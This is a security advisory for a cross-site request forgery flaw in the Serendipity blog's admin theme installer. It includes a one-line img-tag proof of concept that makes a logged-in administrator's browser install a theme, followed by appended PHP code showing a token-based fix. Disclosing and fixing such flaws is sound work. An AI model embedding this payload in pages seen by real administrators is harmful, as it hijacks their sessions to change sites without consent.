s9y Serendipity Cross Site Request Forgery

2017.04.12
Credit: Zhiyang Zeng
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

Details
=======
Software: s9y Serendipity
Version: <2.0.5
Homepage: https://docs.s9y.org/

Description
===========
A GET-type CSRF in the Serendipity admin template module lets an attacker install any theme; the install action is not protected by an anti-CSRF token.

POC
===
Embed the following in any page; when a logged-in Serendipity administrator loads that page, the browser issues the install request with the admin's session cookie and the attack occurs:

<img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya">

Mitigations
===========
Update to Serendipity v2.1.x

FIX
===
https://github.com/s9y/Serendipity/issues/452

Best regards,
Zhiyang Zeng of Tencent security platform department
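The defence the advisory points at is a per-session anti-CSRF token plus a POST-only requirement on state-changing admin actions. The following is an added illustration, not Serendipity's own code or its actual fix; the function names, the `csrf_token` field and the dispatch fragment are hypothetical, but the module/action parameter names match the request shown in the PoC.

```php
<?php
// Added example (hypothetical, not Serendipity's fix): gate the
// templates/install admin action behind a session-bound CSRF token and
// require POST, so an <img> tag on a third-party page can no longer
// trigger a theme install in an administrator's browser.
declare(strict_types=1);
session_start();

// One random token per session, created lazily.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every admin form that changes state.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Abort unless the request is a POST carrying the session's token.
function csrf_check(): void {
    // A cross-site <img> can only produce a GET, so rejecting non-POST
    // requests already closes the PoC's vector; the token also blocks
    // auto-submitted cross-site forms.
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('admin actions must be submitted with POST');
    }
    $sent = $_POST['csrf_token'] ?? '';
    // hash_equals: constant-time comparison, avoids leaking the token.
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('missing or invalid CSRF token');
    }
}

// Hypothetical dispatch for the admin template module; the parameter
// names mirror the advisory's serendipity[adminModule]/[adminAction].
$module = $_REQUEST['serendipity']['adminModule'] ?? '';
$action = $_REQUEST['serendipity']['adminAction'] ?? '';
if ($module === 'templates' && $action === 'install') {
    csrf_check();   // GET or tokenless POST never reaches the install
    $theme = (string) ($_POST['serendipity']['theme'] ?? '');
    // ... perform the theme install for $theme here (omitted) ...
}
```

The same check should wrap every other state-changing admin action, not only theme installs, since any tokenless GET handler is exploitable the same way.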